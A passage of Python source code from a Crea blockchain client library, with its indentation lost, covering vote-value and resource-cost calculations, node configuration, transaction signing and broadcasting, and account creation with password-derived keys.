self.rpc.set_next_node_on_empty_reply(True)
if self.rpc.get_use_appbase():
ret = self.rpc.get_hardfork_properties(api="database")
else:
ret = self.rpc.get_next_scheduled_hardfork(api="database")
return ret
def get_network(self, use_stored_data=True):
""" Identify the network
:param bool use_stored_data: if True, stored data will be returned. If stored data are
empty or old, refresh_data() is used.
:returns: Network parameters
:rtype: dictionary
"""
if use_stored_data:
self.refresh_data()
return self.data['network']
if self.rpc is None:
return None
try:
return self.rpc.get_network()
except:
return known_chains["CREA"]
def get_median_price(self, use_stored_data=True):
""" Returns the current median history price as Price
"""
median_price = self.get_current_median_history(use_stored_data=use_stored_data)
if median_price is None:
return None
a = Price(
None,
base=Amount(median_price['base'], crea_instance=self),
quote=Amount(median_price['quote'], crea_instance=self),
crea_instance=self
)
return a.as_base(self.sbd_symbol)
def get_block_interval(self, use_stored_data=True):
"""Returns the block interval in seconds"""
props = self.get_config(use_stored_data=use_stored_data)
block_interval = 3
if props is None:
return block_interval
for key in props:
if key[-14:] == "BLOCK_INTERVAL":
block_interval = props[key]
return block_interval
def get_blockchain_version(self, use_stored_data=True):
"""Returns the blockchain version"""
props = self.get_config(use_stored_data=use_stored_data)
blockchain_version = '0.0.0'
if props is None:
return blockchain_version
for key in props:
if key[-18:] == "BLOCKCHAIN_VERSION":
blockchain_version = props[key]
return blockchain_version
def get_dust_threshold(self, use_stored_data=True):
"""Returns the vote dust threshold"""
props = self.get_config(use_stored_data=use_stored_data)
dust_threshold = 0
if props is None:
return dust_threshold
for key in props:
if key[-20:] == "VOTE_DUST_THRESHOLD":
dust_threshold = props[key]
return dust_threshold
def get_resource_params(self):
"""Returns the resource parameter"""
return self.rpc.get_resource_params(api="rc")["resource_params"]
def get_resource_pool(self):
"""Returns the resource pool"""
return self.rpc.get_resource_pool(api="rc")["resource_pool"]
def get_rc_cost(self, resource_count):
"""Returns the RC costs based on the resource_count"""
pools = self.get_resource_pool()
params = self.get_resource_params()
config = self.get_config()
dyn_param = self.get_dynamic_global_properties()
rc_regen = int(Amount(dyn_param["total_vesting_shares"], crea_instance=self)) / (CREA_RC_REGEN_TIME / config["CREA_BLOCK_INTERVAL"])
total_cost = 0
if rc_regen == 0:
return total_cost
for resource_type in resource_count:
curve_params = params[resource_type]["price_curve_params"]
current_pool = int(pools[resource_type]["pool"])
count = resource_count[resource_type]
count *= params[resource_type]["resource_dynamics_params"]["resource_unit"]
cost = self._compute_rc_cost(curve_params, current_pool, count, rc_regen)
total_cost += cost
return total_cost
def _compute_rc_cost(self, curve_params, current_pool, resource_count, rc_regen):
"""Helper function for computing the RC costs"""
num = int(rc_regen)
num *= int(curve_params['coeff_a'])
num = int(num) >> int(curve_params['shift'])
num += 1
num *= int(resource_count)
denom = int(curve_params['coeff_b'])
if int(current_pool) > 0:
denom += int(current_pool)
num_denom = num / denom
return int(num_denom) + 1
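    # Worked sketch of the cost curve above with made-up parameters (not real
    # chain values). With coeff_a=17, coeff_b=30000, shift=4, rc_regen=1000,
    # current_pool=50000 and resource_count=200:
    #   num   = (((1000 * 17) >> 4) + 1) * 200 = 1063 * 200 = 212600
    #   denom = 30000 + 50000 = 80000
    #   cost  = int(212600 / 80000) + 1 = 3
    # i.e. Crea(offline=True)._compute_rc_cost({'coeff_a': 17, 'coeff_b': 30000,
    # 'shift': 4}, 50000, 200, 1000) would return 3.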
def rshares_to_sbd(self, rshares, not_broadcasted_vote=False, use_stored_data=True):
""" Calculates the current CBD value of a vote
"""
payout = float(rshares) * self.get_sbd_per_rshares(use_stored_data=use_stored_data,
not_broadcasted_vote_rshares=rshares if not_broadcasted_vote else 0)
return payout
def get_sbd_per_rshares(self, not_broadcasted_vote_rshares=0, use_stored_data=True):
""" Returns the current rshares to CBD ratio
"""
reward_fund = self.get_reward_funds(use_stored_data=use_stored_data)
reward_balance = Amount(reward_fund["reward_balance"], crea_instance=self).amount
recent_claims = float(reward_fund["recent_claims"]) + not_broadcasted_vote_rshares
fund_per_share = reward_balance / (recent_claims)
median_price = self.get_median_price(use_stored_data=use_stored_data)
if median_price is None:
return 0
CBD_price = (median_price * Amount(1, self.crea_symbol, crea_instance=self)).amount
return fund_per_share * CBD_price
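    # Worked sketch with made-up numbers (not live chain data): a reward
    # balance of 800,000 CREA, recent_claims of 4e14 and a median price of
    # 0.25 CBD/CREA give fund_per_share = 800000 / 4e14 = 2e-9, so one
    # billion rshares are worth roughly 2e-9 * 0.25 * 1e9 = 0.5 CBD, which is
    # what rshares_to_sbd(1e9) would report under those conditions.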
def get_crea_per_mvest(self, time_stamp=None, use_stored_data=True):
""" Returns the MVEST to CREA ratio
:param int time_stamp: (optional) if set, return an estimated
CREA per MVEST ratio for the given time stamp. If unset the
current ratio is returned (default). (can also be a datetime object)
"""
if time_stamp is not None:
if isinstance(time_stamp, (datetime, date)):
time_stamp = formatToTimeStamp(time_stamp)
a = 2.1325476281078992e-05
b = -31099.685481490847
a2 = 2.9019227739473682e-07
b2 = 48.41432402074669
if (time_stamp < (b2 - b) / (a - a2)):
return a * time_stamp + b
else:
return a2 * time_stamp + b2
global_properties = self.get_dynamic_global_properties(use_stored_data=use_stored_data)
return (
Amount(global_properties['total_vesting_fund_crea'], crea_instance=self).amount /
(Amount(global_properties['total_vesting_shares'], crea_instance=self).amount / 1e6)
)
def vests_to_sp(self, vests, timestamp=None, use_stored_data=True):
""" Converts vests to SP
:param amount.Amount vests/float vests: Vests to convert
:param int timestamp: (Optional) Can be used to calculate
the conversion rate from the past
"""
if isinstance(vests, Amount):
vests = vests.amount
return vests / 1e6 * self.get_crea_per_mvest(timestamp, use_stored_data=use_stored_data)
def sp_to_vests(self, sp, timestamp=None, use_stored_data=True):
""" Converts SP to vests
:param float sp: Crea power to convert
:param datetime timestamp: (Optional) Can be used to calculate
the conversion rate from the past
"""
return sp * 1e6 / self.get_crea_per_mvest(timestamp, use_stored_data=use_stored_data)
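# Hedged usage sketch (instance creation is illustrative):
#   c = Crea()
#   vests = c.sp_to_vests(10)     # 10 SP expressed as VESTS
#   sp = c.vests_to_sp(vests)     # converts back to roughly 10 SP
# Both directions use get_crea_per_mvest(), so results follow the global
# total_vesting_fund_crea / total_vesting_shares ratio.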
def sp_to_sbd(self, sp, voting_power=CREA_100_PERCENT, vote_pct=CREA_100_PERCENT, not_broadcasted_vote=True, use_stored_data=True):
""" Obtain the resulting CBD vote value from Crea power
:param number sp: Crea Power
:param int voting_power: voting power (100% = 10000)
:param int vote_pct: voting percentage (100% = 10000)
:param bool not_broadcasted_vote: not_broadcasted or already broadcasted vote (True = not_broadcasted vote).
Only impactful for very big votes. Slight modification to the value calculation, as the not_broadcasted
vote rshares decreases the reward pool.
"""
vesting_shares = int(self.sp_to_vests(sp, use_stored_data=use_stored_data))
return self.vests_to_sbd(vesting_shares, voting_power=voting_power, vote_pct=vote_pct, not_broadcasted_vote=not_broadcasted_vote, use_stored_data=use_stored_data)
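# Hedged usage sketch (values are placeholders):
#   c = Crea()
#   value = c.sp_to_sbd(500, voting_power=10000, vote_pct=10000)
#   # estimated CBD value of a full-power 100% vote cast with 500 SP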
def vests_to_sbd(self, vests, voting_power=CREA_100_PERCENT, vote_pct=CREA_100_PERCENT, not_broadcasted_vote=True, use_stored_data=True):
""" Obtain the resulting CBD vote value from vests
:param number vests: vesting shares
:param int voting_power: voting power (100% = 10000)
:param int vote_pct: voting percentage (100% = 10000)
:param bool not_broadcasted_vote: not_broadcasted or already broadcasted vote (True = not_broadcasted vote).
Only impactful for very big votes. Slight modification to the value calculation, as the not_broadcasted
vote rshares decreases the reward pool.
"""
vote_rshares = self.vests_to_rshares(vests, voting_power=voting_power, vote_pct=vote_pct)
return self.rshares_to_sbd(vote_rshares, not_broadcasted_vote=not_broadcasted_vote, use_stored_data=use_stored_data)
def _max_vote_denom(self, use_stored_data=True):
# get props
global_properties = self.get_dynamic_global_properties(use_stored_data=use_stored_data)
vote_power_reserve_rate = global_properties['vote_power_reserve_rate']
max_vote_denom = vote_power_reserve_rate * CREA_VOTE_REGENERATION_SECONDS
return max_vote_denom
def _calc_resulting_vote(self, voting_power=CREA_100_PERCENT, vote_pct=CREA_100_PERCENT, use_stored_data=True):
# determine voting power used
used_power = int((voting_power * abs(vote_pct)) / CREA_100_PERCENT * (60 * 60 * 24))
max_vote_denom = self._max_vote_denom(use_stored_data=use_stored_data)
used_power = int((used_power + max_vote_denom - 1) / max_vote_denom)
return used_power
def sp_to_rshares(self, crea_power, voting_power=CREA_100_PERCENT, vote_pct=CREA_100_PERCENT, use_stored_data=True):
""" Obtain the r-shares from Crea power
:param number crea_power: Crea Power
:param int voting_power: voting power (100% = 10000)
:param int vote_pct: voting percentage (100% = 10000)
"""
# calculate our account voting shares (from vests)
vesting_shares = int(self.sp_to_vests(crea_power, use_stored_data=use_stored_data))
return self.vests_to_rshares(vesting_shares, voting_power=voting_power, vote_pct=vote_pct, use_stored_data=use_stored_data)
def vests_to_rshares(self, vests, voting_power=CREA_100_PERCENT, vote_pct=CREA_100_PERCENT, subtract_dust_threshold=True, use_stored_data=True):
""" Obtain the r-shares from vests
:param number vests: vesting shares
:param int voting_power: voting power (100% = 10000)
:param int vote_pct: voting percentage (100% = 10000)
:param bool subtract_dust_threshold: subtract the vote dust threshold from the result (default True)
"""
used_power = self._calc_resulting_vote(voting_power=voting_power, vote_pct=vote_pct, use_stored_data=use_stored_data)
# calculate vote rshares
rshares = int(math.copysign(vests * 1e6 * used_power / CREA_100_PERCENT, vote_pct))
if subtract_dust_threshold:
if abs(rshares) <= self.get_dust_threshold(use_stored_data=use_stored_data):
return 0
rshares -= math.copysign(self.get_dust_threshold(use_stored_data=use_stored_data), vote_pct)
return rshares
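# Illustrative note on the dust threshold handling above (numbers are assumed):
# with a dust threshold of 50000000, raw rshares of 60000000 are returned as
# 10000000, and anything at or below 50000000 collapses to 0.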
def sbd_to_rshares(self, sbd, not_broadcasted_vote=False, use_stored_data=True):
""" Obtain the r-shares from CBD
:param sbd: CBD
:type sbd: str, int, amount.Amount
:param bool not_broadcasted_vote: not_broadcasted or already broadcasted vote (True = not_broadcasted vote).
Only impactful for very high amounts of CBD. Slight modification to the value calculation, as the not_broadcasted
vote rshares decreases the reward pool.
"""
if isinstance(sbd, Amount):
sbd = Amount(sbd, crea_instance=self)
elif isinstance(sbd, string_types):
sbd = Amount(sbd, crea_instance=self)
else:
sbd = Amount(sbd, self.sbd_symbol, crea_instance=self)
if sbd['symbol'] != self.sbd_symbol:
raise AssertionError('Should input CBD, not any other asset!')
# If the vote was already broadcasted we can assume the blockchain values to be true
if not not_broadcasted_vote:
return int(sbd.amount / self.get_sbd_per_rshares(use_stored_data=use_stored_data))
# If the vote wasn't broadcasted (yet), we have to calculate the rshares while considering
# the change our vote is causing to the recent_claims. This is more important for really
# big votes which have a significant impact on the recent_claims.
reward_fund = self.get_reward_funds(use_stored_data=use_stored_data)
median_price = self.get_median_price(use_stored_data=use_stored_data)
recent_claims = int(reward_fund["recent_claims"])
reward_balance = Amount(reward_fund["reward_balance"], crea_instance=self)
reward_pool_sbd = median_price * reward_balance
if sbd > reward_pool_sbd:
raise ValueError('Provided more CBD than available in the reward pool.')
# This is the formula we can use to determine the "true" rshares.
# We get this formula by some math magic using the previous used formulas
# FundsPerShare = (balance / (claims + newShares)) * Price
# newShares = amount / FundsPerShare
# We can now resolve both formulas for FundsPerShare and set the formulas to be equal
# (balance / (claims + newShares)) * price = amount / newShares
# Now we resolve for newShares resulting in:
# newShares = claims * amount / (balance * price - amount)
rshares = recent_claims * sbd.amount / ((reward_balance.amount * float(median_price)) - sbd.amount)
return int(rshares)
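# Worked numeric illustration of the formula above (values are assumptions,
# not real chain data):
#   recent_claims = 1e9, reward_balance = 100000 CREA, median price = 0.5 CBD/CREA
#   asking for 10 CBD -> rshares = 1e9 * 10 / (100000 * 0.5 - 10) ~= 200040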
def rshares_to_vote_pct(self, rshares, crea_power=None, vests=None, voting_power=CREA_100_PERCENT, use_stored_data=True):
""" Obtain the voting percentage for a desired rshares value
for a given Crea Power or vesting shares and voting_power
Give either crea_power or vests, not both.
When the output is greater than 10000 or less than -10000,
the given absolute rshares are too high
Returns the required voting percentage (100% = 10000)
:param number rshares: desired rshares value
:param number crea_power: Crea Power
:param number vests: vesting shares
:param int voting_power: voting power (100% = 10000)
"""
if crea_power is None and vests is None:
raise ValueError("Either crea_power or vests has to be set!")
if crea_power is not None and vests is not None:
raise ValueError("Either crea_power or vests has to be set. Not both!")
if crea_power is not None:
vests = int(self.sp_to_vests(crea_power, use_stored_data=use_stored_data) * 1e6)
if self.hardfork >= 20:
rshares += math.copysign(self.get_dust_threshold(use_stored_data=use_stored_data), rshares)
max_vote_denom = self._max_vote_denom(use_stored_data=use_stored_data)
used_power = int(math.ceil(abs(rshares) * CREA_100_PERCENT / vests))
used_power = used_power * max_vote_denom
vote_pct = used_power * CREA_100_PERCENT / (60 * 60 * 24) / voting_power
return int(math.copysign(vote_pct, rshares))
def sbd_to_vote_pct(self, sbd, crea_power=None, vests=None, voting_power=CREA_100_PERCENT, not_broadcasted_vote=True, use_stored_data=True):
""" Obtain the voting percentage for a desired CBD value
for a given Crea Power or vesting shares and voting power
Give either Crea Power or vests, not both.
When the output is greater than 10000 or smaller than -10000,
the CBD value is too high.
Returns the required voting percentage (100% = 10000)
:param sbd: desired CBD value
:type sbd: str, int, amount.Amount
:param number crea_power: Crea Power
:param number vests: vesting shares
:param bool not_broadcasted_vote: not_broadcasted or already broadcasted vote (True = not_broadcasted vote).
Only impactful for very high amounts of CBD. Slight modification to the value calculation, as the not_broadcasted
vote rshares decreases the reward pool.
"""
if isinstance(sbd, Amount):
sbd = Amount(sbd, crea_instance=self)
elif isinstance(sbd, string_types):
sbd = Amount(sbd, crea_instance=self)
else:
sbd = Amount(sbd, self.sbd_symbol, crea_instance=self)
if sbd['symbol'] != self.sbd_symbol:
raise AssertionError()
rshares = self.sbd_to_rshares(sbd, not_broadcasted_vote=not_broadcasted_vote, use_stored_data=use_stored_data)
return self.rshares_to_vote_pct(rshares, crea_power=crea_power, vests=vests, voting_power=voting_power, use_stored_data=use_stored_data)
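# Hedged usage sketch (amounts are placeholders; the CBD symbol must match the chain):
#   c = Crea()
#   pct = c.sbd_to_vote_pct("0.100 CBD", crea_power=1000, voting_power=10000)
#   # a result above 10000 (or below -10000) means the target value is unreachable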
def get_chain_properties(self, use_stored_data=True):
""" Return witness elected chain properties
Properties:::
{
'account_creation_fee': '30.000 CREA',
'maximum_block_size': 65536,
'sbd_interest_rate': 250
}
"""
if use_stored_data:
self.refresh_data()
return self.data['witness_schedule']['median_props']
else:
return self.get_witness_schedule(use_stored_data)['median_props']
def get_witness_schedule(self, use_stored_data=True):
""" Return witness elected chain properties
"""
if use_stored_data:
self.refresh_data()
return self.data['witness_schedule']
if self.rpc is None:
return None
self.rpc.set_next_node_on_empty_reply(True)
return self.rpc.get_witness_schedule(api="database")
def get_config(self, use_stored_data=True):
""" Returns internal chain configuration.
:param bool use_stored_data: If True, the cached value is returned
"""
if use_stored_data:
self.refresh_data()
config = self.data['config']
else:
if self.rpc is None:
return None
self.rpc.set_next_node_on_empty_reply(True)
config = self.rpc.get_config(api="database")
return config
@property
def chain_params(self):
if self.offline or self.rpc is None:
return known_chains["CREA"]
else:
return self.get_network()
@property
def hardfork(self):
if self.offline or self.rpc is None:
versions = known_chains['CREA']['min_version']
else:
hf_prop = self.get_hardfork_properties()
if "current_hardfork_version" in hf_prop:
versions = hf_prop["current_hardfork_version"]
else:
versions = self.get_blockchain_version()
return int(versions.split('.')[1])
@property
def prefix(self):
return self.chain_params["prefix"]
def set_default_account(self, account):
""" Set the default account to be used
"""
Account(account, crea_instance=self)
config["default_account"] = account
def set_password_storage(self, password_storage):
""" Set the password storage mode.
When set to "no", the password has to be provided each time.
When set to "environment" the password is taken from the
UNLOCK variable
When set to "keyring" the password is taken from the
python keyring module. A wallet password can be stored with
python -m keyring set crea wallet password
:param str password_storage: can be "no",
"keyring" or "environment"
"""
config["password_storage"] = password_storage
def set_default_nodes(self, nodes):
""" Set the default nodes to be used
"""
if bool(nodes):
if isinstance(nodes, list):
nodes = str(nodes)
config["node"] = nodes
else:
config.delete("node")
def get_default_nodes(self):
"""Returns the default nodes"""
if "node" in config:
nodes = config["node"]
elif "nodes" in config:
nodes = config["nodes"]
elif "default_nodes" in config and bool(config["default_nodes"]):
nodes = config["default_nodes"]
else:
nodes = []
if isinstance(nodes, str) and nodes[0] == '[' and nodes[-1] == ']':
nodes = ast.literal_eval(nodes)
return nodes
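# Illustrative note: config["node"] may hold a single URL string or a stringified
# list; the ast.literal_eval branch above turns
#   "['https://node1', 'https://node2']"
# back into a real Python list, while a plain URL string is returned unchanged.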
def move_current_node_to_front(self):
"""Returns the default node list, until the first entry
is equal to the current working node url
"""
node = self.get_default_nodes()
if len(node) < 2:
return
offline = self.offline
while not offline and node[0] != self.rpc.url and len(node) > 1:
node = node[1:] + [node[0]]
self.set_default_nodes(node)
def set_default_vote_weight(self, vote_weight):
""" Set the default vote weight to be used
"""
config["default_vote_weight"] = vote_weight
def finalizeOp(self, ops, account, permission, **kwargs):
""" This method obtains the required private keys if present in
the wallet, finalizes the transaction, signs it and
broadcasts it
:param ops: The operation (or list of operations) to
broadcast
:type ops: list, GrapheneObject
:param Account account: The account that authorizes the
operation
:param string permission: The required permission for
signing (active, owner, posting)
:param TransactionBuilder append_to: This allows providing an instance of
TransactionBuilder (see :func:`Crea.new_tx()`) to specify
where to put a specific operation.
.. note:: ``append_to`` is exposed to every method used in the
Crea class
.. note:: If ``ops`` is a list of operations, they all need to be
signable by the same key! Thus, you cannot combine ops
that require active permission with ops that require
posting permission. Neither can you use different
accounts for different operations!
.. note:: This uses :func:`Crea.txbuffer` as instance of
:class:`crea.transactionbuilder.TransactionBuilder`.
You may want to use your own txbuffer
"""
if self.offline:
return {}
if "append_to" in kwargs and kwargs["append_to"]:
# Append to the append_to and return
append_to = kwargs["append_to"]
parent = append_to.get_parent()
if not isinstance(append_to, (TransactionBuilder)):
raise AssertionError()
append_to.appendOps(ops)
# Add the signer to the buffer so we sign the tx properly
parent.appendSigner(account, permission)
# This returns as we used append_to, it does NOT broadcast, or sign
return append_to.get_parent()
# Go forward to see what the other options do ...
else:
# Append to the default buffer
self.txbuffer.appendOps(ops)
# Add signing information, signer, sign and optionally broadcast
if self.unsigned:
# In case we don't want to sign anything
self.txbuffer.addSigningInformation(account, permission)
return self.txbuffer
elif self.bundle:
# In case we want to add more ops to the tx (bundle)
self.txbuffer.appendSigner(account, permission)
return self.txbuffer.json()
else:
# default behavior: sign + broadcast
self.txbuffer.appendSigner(account, permission)
self.txbuffer.sign()
return self.txbuffer.broadcast()
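# Hedged usage sketch of the append_to path (names and values are placeholders):
#   c = Crea()
#   tx = c.new_tx()                                    # dedicated TransactionBuilder
#   c.custom_json("my_id", {"k": "v"},
#                 required_posting_auths=["account"],
#                 append_to=tx)                         # queued only, not broadcast
#   tx.sign()
#   tx.broadcast()                                      # broadcast all queued ops at once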
def sign(self, tx=None, wifs=[], reconstruct_tx=True):
""" Sign a provided transaction with the provided key(s)
:param dict tx: The transaction to be signed and returned
:param string wifs: One or many wif keys to use for signing
a transaction. If not present, the keys will be loaded
from the wallet as defined in "missing_signatures" key
of the transactions.
:param bool reconstruct_tx: when set to False and tx
is already constructed, it will not be reconstructed
and already added signatures remain
"""
if tx:
txbuffer = TransactionBuilder(tx, crea_instance=self)
else:
txbuffer = self.txbuffer
txbuffer.appendWif(wifs)
txbuffer.appendMissingSignatures()
txbuffer.sign(reconstruct_tx=reconstruct_tx)
return txbuffer.json()
def broadcast(self, tx=None):
""" Broadcast a transaction to the Crea network
:param tx tx: Signed transaction to broadcast
"""
if tx:
# If tx is provided, we broadcast the tx
return TransactionBuilder(tx, crea_instance=self).broadcast()
else:
return self.txbuffer.broadcast()
def info(self, use_stored_data=True):
""" Returns the global properties
"""
return self.get_dynamic_global_properties(use_stored_data=use_stored_data)
# -------------------------------------------------------------------------
# Wallet stuff
# -------------------------------------------------------------------------
def newWallet(self, pwd):
""" Create a new wallet. This method is basically only calls
:func:`crea.wallet.Wallet.create`.
:param str pwd: Password to use for the new wallet
:raises WalletExists: if there is already a
wallet created
"""
return self.wallet.create(pwd)
def unlock(self, *args, **kwargs):
""" Unlock the internal wallet
"""
return self.wallet.unlock(*args, **kwargs)
# -------------------------------------------------------------------------
# Transaction Buffers
# -------------------------------------------------------------------------
@property
def txbuffer(self):
""" Returns the currently active tx buffer
"""
return self.tx()
def tx(self):
""" Returns the default transaction buffer
"""
return self._txbuffers[0]
def new_tx(self, *args, **kwargs):
""" Let's obtain a new txbuffer
:returns: id of the new txbuffer
:rtype: int
"""
builder = TransactionBuilder(
*args,
crea_instance=self,
**kwargs
)
self._txbuffers.append(builder)
return builder
def clear(self):
self._txbuffers = []
# Base/Default proposal/tx buffers
self.new_tx()
# self.new_proposal()
# -------------------------------------------------------------------------
# Account related calls
# -------------------------------------------------------------------------
def claim_account(self, creator, fee=None, **kwargs):
""" Claim account for claimed account creation.
When fee is 0 CREA a subsidized account is claimed and can be created
later with create_claimed_account.
The number of subsidized accounts is limited.
:param str creator: which account should pay the registration fee (RC or CREA)
(defaults to ``default_account``)
:param str fee: when set to 0 CREA (default), claim account is paid by RC
"""
fee = fee if fee is not None else "0 %s" % (self.crea_symbol)
if not creator and config["default_account"]:
creator = config["default_account"]
if not creator:
raise ValueError(
"Not creator account given. Define it with " +
"creator=x, or set the default_account using creapy")
creator = Account(creator, crea_instance=self)
op = {
"fee": Amount(fee, crea_instance=self),
"creator": creator["name"],
"prefix": self.prefix,
}
op = operations.Claim_account(**op)
return self.finalizeOp(op, creator, "active", **kwargs)
def create_claimed_account(
self,
account_name,
creator=None,
owner_key=None,
active_key=None,
memo_key=None,
posting_key=None,
password=None,
additional_owner_keys=[],
additional_active_keys=[],
additional_posting_keys=[],
additional_owner_accounts=[],
additional_active_accounts=[],
additional_posting_accounts=[],
storekeys=True,
store_owner_key=False,
json_meta=None,
combine_with_claim_account=False,
fee=None,
**kwargs
):
""" Create new claimed account on Crea
The brainkey/password can be used to recover all generated keys
(see :class:`creagraphenebase.account` for more details).
By default, this call will use ``default_account`` to
register a new name ``account_name`` with all keys being
derived from a new brain key that will be returned. The
corresponding keys will automatically be installed in the
wallet.
.. warning:: Don't call this method unless you know what
you are doing! Be sure to understand what this
method does and where to find the private keys
for your account.
.. note:: Please note that this imports private keys
(if password is present) into the wallet by
default when nobroadcast is set to False.
However, it **does not import the owner
key** for security reasons by default.
If you set store_owner_key to True, the
owner key is stored.
Do NOT expect to be able to recover it from
the wallet if you lose your password!
.. note:: Account creations cost a fee that is defined by
the network. If you create an account, you will
need to pay for that fee!
:param str account_name: (**required**) new account name
:param str json_meta: Optional meta data for the account
:param str owner_key: Main owner key
:param str active_key: Main active key
:param str posting_key: Main posting key
:param str memo_key: Main memo_key
:param str password: Alternatively to providing keys, one
can provide a password from which the
keys will be derived
:param array additional_owner_keys: Additional owner public keys
:param array additional_active_keys: Additional active public keys
:param array additional_posting_keys: Additional posting public keys
:param array additional_owner_accounts: Additional owner account
names
:param array additional_active_accounts: Additional active account
names
:param bool storekeys: Store new keys in the wallet (default:
``True``)
:param bool combine_with_claim_account: When set to True, a
claim_account operation is additionally broadcasted
:param str fee: When combine_with_claim_account is set to True,
this parameter is used for the claim_account operation
:param str creator: which account should pay the registration fee
(defaults to ``default_account``)
:raises AccountExistsException: if the account already exists on
the blockchain
"""
fee = fee if fee is not None else "0 %s" % (self.crea_symbol)
if not creator and config["default_account"]:
creator = config["default_account"]
if not creator:
raise ValueError(
"Not creator account given. Define it with " +
"creator=x, or set the default_account using creapy")
if password and (owner_key or active_key or memo_key):
raise ValueError(
"You cannot use 'password' AND provide keys!"
)
try:
Account(account_name, crea_instance=self)
raise AccountExistsException
except AccountDoesNotExistsException:
pass
creator = Account(creator, crea_instance=self)
" Generate new keys from password"
from creagraphenebase.account import PasswordKey
if password:
active_key = PasswordKey(account_name, password, role="active", prefix=self.prefix)
owner_key = PasswordKey(account_name, password, role="owner", prefix=self.prefix)
posting_key = PasswordKey(account_name, password, role="posting", prefix=self.prefix)
memo_key = PasswordKey(account_name, password, role="memo", prefix=self.prefix)
active_pubkey = active_key.get_public_key()
owner_pubkey = owner_key.get_public_key()
posting_pubkey = posting_key.get_public_key()
memo_pubkey = memo_key.get_public_key()
active_privkey = active_key.get_private_key()
posting_privkey = posting_key.get_private_key()
owner_privkey = owner_key.get_private_key()
memo_privkey = memo_key.get_private_key()
# store private keys
try:
if storekeys and not self.nobroadcast:
if store_owner_key:
self.wallet.addPrivateKey(str(owner_privkey))
self.wallet.addPrivateKey(str(active_privkey))
self.wallet.addPrivateKey(str(memo_privkey))
self.wallet.addPrivateKey(str(posting_privkey))
except ValueError as e:
log.info(str(e))
elif (owner_key and active_key and memo_key and posting_key):
active_pubkey = PublicKey(
active_key, prefix=self.prefix)
owner_pubkey = PublicKey(
owner_key, prefix=self.prefix)
posting_pubkey = PublicKey(
posting_key, prefix=self.prefix)
memo_pubkey = PublicKey(
memo_key, prefix=self.prefix)
else:
raise ValueError(
"Call incomplete! Provide either a password or public keys!"
)
owner = format(owner_pubkey, self.prefix)
active = format(active_pubkey, self.prefix)
posting = format(posting_pubkey, self.prefix)
memo = format(memo_pubkey, self.prefix)
owner_key_authority = [[owner, 1]]
active_key_authority = [[active, 1]]
posting_key_authority = [[posting, 1]]
owner_accounts_authority = []
active_accounts_authority = []
posting_accounts_authority = []
# additional authorities
for k in additional_owner_keys:
owner_key_authority.append([k, 1])
for k in additional_active_keys:
active_key_authority.append([k, 1])
for k in additional_posting_keys:
posting_key_authority.append([k, 1])
for k in additional_owner_accounts:
addaccount = Account(k, crea_instance=self)
owner_accounts_authority.append([addaccount["name"], 1])
for k in additional_active_accounts:
addaccount = Account(k, crea_instance=self)
active_accounts_authority.append([addaccount["name"], 1])
for k in additional_posting_accounts:
addaccount = Account(k, crea_instance=self)
posting_accounts_authority.append([addaccount["name"], 1])
if combine_with_claim_account:
op = {
"fee": Amount(fee, crea_instance=self),
"creator": creator["name"],
"prefix": self.prefix,
}
op = operations.Claim_account(**op)
ops = [op]
op = {
"creator": creator["name"],
"new_account_name": account_name,
'owner': {'account_auths': owner_accounts_authority,
'key_auths': owner_key_authority,
"address_auths": [],
'weight_threshold': 1},
'active': {'account_auths': active_accounts_authority,
'key_auths': active_key_authority,
"address_auths": [],
'weight_threshold': 1},
'posting': {'account_auths': posting_accounts_authority,
'key_auths': posting_key_authority,
"address_auths": [],
'weight_threshold': 1},
'memo_key': memo,
"json_metadata": json_meta or {},
"prefix": self.prefix,
}
op = operations.Create_claimed_account(**op)
if combine_with_claim_account:
ops.append(op)
return self.finalizeOp(ops, creator, "active", **kwargs)
else:
return self.finalizeOp(op, creator, "active", **kwargs)
def create_account(
self,
account_name,
creator=None,
owner_key=None,
active_key=None,
memo_key=None,
posting_key=None,
password=None,
additional_owner_keys=[],
additional_active_keys=[],
additional_posting_keys=[],
additional_owner_accounts=[],
additional_active_accounts=[],
additional_posting_accounts=[],
storekeys=True,
store_owner_key=False,
json_meta=None,
**kwargs
):
""" Create new account on Crea
The brainkey/password can be used to recover all generated keys
(see :class:`creagraphenebase.account` for more details).
By default, this call will use ``default_account`` to
register a new name ``account_name`` with all keys being
derived from a new brain key that will be returned. The
corresponding keys will automatically be installed in the
wallet.
.. warning:: Don't call this method unless you know what
you are doing! Be sure to understand what this
method does and where to find the private keys
for your account.
.. note:: Please note that this imports private keys
(if password is present) into the wallet by
default when nobroadcast is set to False.
However, it **does not import the owner
key** for security reasons by default.
If you set store_owner_key to True, the
owner key is stored.
Do NOT expect to be able to recover it from
the wallet if you lose your password!
.. note:: Account creations cost a fee that is defined by
the network. If you create an account, you will
need to pay for that fee!
:param str account_name: (**required**) new account name
:param str json_meta: Optional meta data for the account
:param str owner_key: Main owner key
:param str active_key: Main active key
:param str posting_key: Main posting key
:param str memo_key: Main memo_key
:param str password: Alternatively to providing keys, one
can provide a password from which the
keys will be derived
:param array additional_owner_keys: Additional owner public keys
:param array additional_active_keys: Additional active public keys
:param array additional_posting_keys: Additional posting public keys
:param array additional_owner_accounts: Additional owner account
names
:param array additional_active_accounts: Additional active account
names
:param bool storekeys: Store new keys in the wallet (default:
``True``)
:param str creator: which account should pay the registration fee
(defaults to ``default_account``)
:raises AccountExistsException: if the account already exists on
the blockchain
"""
if not creator and config["default_account"]:
creator = config["default_account"]
if not creator:
raise ValueError(
"Not creator account given. Define it with " +
"creator=x, or set the default_account using creapy")
if password and (owner_key or active_key or memo_key):
raise ValueError(
"You cannot use 'password' AND provide keys!"
)
try:
Account(account_name, crea_instance=self)
raise AccountExistsException
except AccountDoesNotExistsException:
pass
creator = Account(creator, crea_instance=self)
" Generate new keys from password"
from creagraphenebase.account import PasswordKey
if password:
active_key = PasswordKey(account_name, password, role="active", prefix=self.prefix)
owner_key = PasswordKey(account_name, password, role="owner", prefix=self.prefix)
posting_key = PasswordKey(account_name, password, role="posting", prefix=self.prefix)
memo_key = PasswordKey(account_name, password, role="memo", prefix=self.prefix)
active_pubkey = active_key.get_public_key()
owner_pubkey = owner_key.get_public_key()
posting_pubkey = posting_key.get_public_key()
memo_pubkey = memo_key.get_public_key()
active_privkey = active_key.get_private_key()
posting_privkey = posting_key.get_private_key()
owner_privkey = owner_key.get_private_key()
memo_privkey = memo_key.get_private_key()
# store private keys
try:
if storekeys and not self.nobroadcast:
if store_owner_key:
self.wallet.addPrivateKey(str(owner_privkey))
self.wallet.addPrivateKey(str(active_privkey))
self.wallet.addPrivateKey(str(memo_privkey))
self.wallet.addPrivateKey(str(posting_privkey))
except ValueError as e:
